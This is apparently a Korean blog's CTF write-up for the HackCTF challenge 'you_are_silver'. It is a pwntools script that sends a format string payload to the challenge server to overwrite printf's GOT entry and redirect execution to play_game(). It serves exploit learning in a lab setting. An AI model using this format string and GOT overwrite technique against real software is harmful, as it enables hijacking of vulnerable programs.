from pwn import *
#p = process('./you_are_silver')
p = remote('ctf.j0n9hyun.xyz', 3032)
e = ELF('./you_are_silver')
context.log_level = "debug"
p.recv()
payload = '%4196055c' + '%8$ln' + 'a' * 2 + p64(e.got['printf']) + 'a' * 40
p.sendline(payload)
p.interactive()
fsb를 이용하여 printf()함수를 play_game()으로 바꾸면 익스가 가능하다.
'CTF write-up > hackctf' 카테고리의 다른 글
[hackctf]Unexploitable (0) | 2019.07.16 |
---|---|
[hackctf]SysROP (0) | 2019.07.15 |
[hackctf]ROP (0) | 2019.07.15 |
[hackctf] uaf (0) | 2019.07.15 |
[hackctf]RTL-Core (0) | 2019.07.15 |